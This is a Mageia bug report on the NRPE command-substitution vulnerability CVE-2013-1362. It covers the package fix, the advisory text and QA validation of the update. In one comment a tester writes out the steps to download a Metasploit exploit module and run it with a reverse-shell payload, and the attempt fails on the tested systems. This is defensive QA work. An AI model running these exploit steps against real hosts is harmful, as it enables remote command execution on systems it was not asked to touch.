Bug 9615 - nrpe new security issue CVE-2013-1362
: nrpe new security issue CVE-2013-1362
Status: RESOLVED FIXED
Product: Mageia
Classification: Unclassified
Component: Security
: 2
: i586 Linux
: Normal Severity: critical
: ---
Assigned To: QA Team
: Sec team
: http://lwn.net/Vulnerabilities/545985/
: has_procedure mga2-64-ok mga2-32-ok
: validated_update
:
:
  Show dependency treegraph
 
Reported: 2013-04-04 18:38 CEST by David Walser
Modified: 2013-05-09 12:36 CEST (History)
4 users (show)

See Also:
Source RPM: nrpe-2.13-6.mga3.src.rpm
CVE:
Status comment:


Attachments

Description David Walser 2013-04-04 18:38:46 CEST
OpenSuSE has issued an advisory today (April 4):
http://lists.opensuse.org/opensuse-updates/2013-04/msg00039.html

Mageia 2 is also affected.

Reproducible: 

Steps to Reproduce:
Comment 1 David Walser 2013-04-05 14:02:14 CEST
Fixed in Cauldron in nrpe-2.14-1.mga3.
Comment 2 David Walser 2013-04-05 14:51:33 CEST
(In reply to David Walser from comment #1)
> Fixed in Cauldron in nrpe-2.14-1.mga3.

Oops, not quite yet:
http://pkgsubmit.mageia.org/uploads/rejected/cauldron/core/release/20130405115319.guillomovitch.valstar.1188.youri
Comment 3 David Walser 2013-04-05 16:05:39 CEST
nrpe-2.14-1.mga3 uploaded in Cauldron.  Thanks Guillaume.
Comment 4 David Walser 2013-05-02 17:25:17 CEST
This is updated in SVN for Mageia 2 by Daniel Lucio.

We had to remove it from updates_testing because the release tag was wrong, as it should be 1 with no subrel, so that it's not newer than Cauldron.  I fixed the release tag in SVN.

Daniel, if this update is otherwise ready, go ahead and submit it to the build system again and we can assign this to QA.  Thanks.
Comment 5 David Walser 2013-05-02 21:48:26 CEST
Updated package uploaded for Mageia 2.  Thanks Daniel!

Advisory:
========================

Updated nrpe packages fix security vulnerability:

NRPE (the Nagios Remote Plug-In Executor) allows the passing of $() to
plugins/scripts which, if run under bash, will execute that shell command
under a subprocess and pass the output as a parameter to the called script.
Using this, it is possible to get called scripts, such as check_http, to
execute arbitrary commands under the uid that NRPE/nagios is running as
(typically, 'nagios') (CVE-2013-1362).

With this update NRPE will deny remote requests containing a bash command substitution.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362
http://lists.opensuse.org/opensuse-updates/2013-04/msg00039.html
========================

Updated packages in core/updates_testing:
========================
nrpe-2.14-1.mga2
nagios-check_nrpe-2.14-1.mga2

from nrpe-2.14-1.mga2.src.rpm
Comment 6 claire robinson 2013-05-03 19:08:07 CEST
PoC: http://www.youtube.com/watch?v=OBgjp9gheBM

# service nrpe start
Starting nrpe (via systemctl):                              [  OK  ]

# netstat -at | grep nrpe
tcp        0      0 *:nrpe           *:*                     LISTEN

# /usr/lib/nagios/plugins/check_nrpe -H localhost
NRPE v2.12

# tailf /var/log/syslog

Open another terminal tab..

$ git clone https://github.com/bcoles/metasploit-framework.git metasploit

$ wget -O metasploit/modules/exploits/linux/misc/nagios_nrpe_arguments.rb http://packetstormsecurity.com/files/download/121287/nagios_nrpe_arguments.rb.txt

$ cd metasploit/
$ ./msfconsole

at metasploit console..

msf > use exploit/linux/misc/nagios_nrpe_arguments
msf  exploit(nagios_nrpe_arguments) > show options
msf  exploit(nagios_nrpe_arguments) > set RHOST localhost
RHOST => localhost
msf  exploit(nagios_nrpe_arguments) > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf  exploit(nagios_nrpe_arguments) > set LHOST localhost
LHOST => localhost
msf  exploit(nagios_nrpe_arguments) > exploit

[*] Started reverse handler on 127.0.0.1:4444
[*] Checking if remote NRPE supports command line arguments
[-] Exploit failed [not-found]: Host does not support plugin command line arguments or is not accepting connections

In syslog in the other terminal tab..

nrpe[18189]: Error: Request contained command arguments, but argument option is not enabled!
nrpe[18189]: Client request was invalid, bailing out...

We're maybe not vulnerable to this, will need to check with 2 hosts rather than both on localhost.
Comment 8 claire robinson 2013-05-03 19:13:17 CEST
Looks like this would have to be set to 1 in /etc/nagios/nrpe.conf

# *** ENABLING THIS OPTION IS A SECURITY RISK! ***
# Read the SECURITY file for information on some of the security implications
# of enabling this variable.
#
# Values: 0=do not allow arguments, 1=allow command arguments

dont_blame_nrpe=0

I'll try to play some more later.
Comment 9 claire robinson 2013-05-03 19:15:15 CEST
Perhaps as we ship with it disabled and this is a direct update rather than patch it is enough to show the service is starting and listening after update.
Comment 10 claire robinson 2013-05-03 19:40:16 CEST
Notice one issue though when stopping/restarting the service..

nrpe[18832]: Caught SIGTERM - shutting down...
nrpe[18832]: Cannot remove pidfile '/var/run/nrpe/nrpe.pid' - check your privileges.
nrpe[18832]: Daemon shutdown
nrpe[19974]: Stopping nrpe: [  OK  ]

# ll /var/run/nrpe/nrpe.pid
-rw-r--r-- 1 root root 6 May  3 18:16 /var/run/nrpe/nrpe.pid

nrpe runs as user/group nagios
Comment 11 claire robinson 2013-05-03 20:20:20 CEST
Tested with two hosts, set to allow commands and to allow connections from each other and both services restarted. I'm not able to reproduce with the PoC, the exploit doesn't show a failure, just doesn't seem to work.

Just testing to ensure the updated service starts and is listening.

# /usr/lib/nagios/plugins/check_nrpe -H <remote host ip>
NRPE v2.14

Checked from 64bit local to 32bit remote and vica versa so confirmed the service is listening and talking.

The permissions issue doesn't prevent the service from stopping but it does leave a pid file behind. The pid file doesn't prevent the service from restarting either, I'll create a new bug for it.

Created bug 9972 for the pid file issue

Validating this one

SRPM & Advisory in comment 5

Could sysadmin please push from core/updates_testing to core/updates

Thanks!
Comment 12 Thomas Backlund 2013-05-09 12:36:25 CEST
Update pushed:
https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0139

Note You need to log in before you can comment on or make changes to this bug.